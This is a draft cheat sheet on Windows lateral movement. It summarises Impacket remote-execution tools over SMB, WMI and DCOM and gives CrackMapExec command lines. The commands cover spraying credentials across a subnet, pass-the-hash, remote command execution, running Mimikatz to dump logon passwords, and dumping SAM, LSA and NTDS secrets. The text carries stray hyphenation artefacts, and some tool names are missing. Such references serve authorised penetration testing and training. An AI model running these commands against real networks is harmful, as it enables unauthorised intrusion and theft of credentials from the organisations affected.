Show Menu

Windows Lateral Movement Cheat Sheet (DRAFT) by

Cheat Sheet for Windows Lateral Movement Techniques

This is a draft cheat sheet. It is a work in progress and is not finished yet.


Writable share required, default ADMIN$. Intera­ctive shell or single command. Similar to psexec.exe, uses RemComSVC.
SMB - 445
No writable share required. Requires 4 SMB Connec­tions. Doesn't use RemComSVC. Semi-i­nte­ractive shell or single command.
SMB - 445
Writable share required, default ADMIN$. Run a single command through task scheduler.
SMB - 445
Semi-i­nte­ractive shell through WMI. No servic­e/agent instal­lation require, runs elevate privileges if possible. Stealthy.
RPC, WMI - 135
Semi-i­nte­ractive shell, similar to WMIexec but using different DCOM endpoints. Blocked by default due to Windows firewall rules.
RCP, DCOM - 135
python <sc­rip­t.p­y> domain­/us­er:­pas­swo­rd@IP <co­mma­nd>

PSExec, SMBExec, WMIExec will obtain shells if <co­mma­nd> is blank


Swiss army knife for pentesting with many features. Spray creden­tials across enviro­nment to enumerate shares, sessions, disks, users, login privil­eges, execute commands, dump SAM and LSA secrets, run mimikatz, and more.
Can perform command execution via Impacket's smbexec, wmiexec, atexec.
Spray domain creds: crackm­apexec 192.16­8.1.0/24 -u user -p 'P@ssw0rd' -d
Spray local creds: crackm­apexec 192.16­8.1.0/24 -u user -p 'P@ssw0rd' --loca­l-user
Spray creds from files: crackm­apexec 192.16­8.1.0/24 -u users.txt -p passwo­rds.txt
Pass-t­he-­hash: crackm­apexec 192.16­8.1.0/24 -u user -H NTLMhash
Execute command: crackm­apexec 192.16­8.1.0/24 -u user -p 'password' --exec­-method smbexec -x whoami
Run Mimikatz: crackm­apexec 192.16­8.1.0/24 -u user -p 'password' -M module­s/c­red­ent­ial­s/m­imi­ -o COMMAN­D='­pri­vil­ege­::d­ebu­g;s­eku­rls­a::­log­onp­ass­words'
Common Enumer­ation Options
Enumerate shares: --shares
Dump sam, lsa or ntds: --sam --lsa --ntds
Sessions: --sessions
Logged on users: --lusers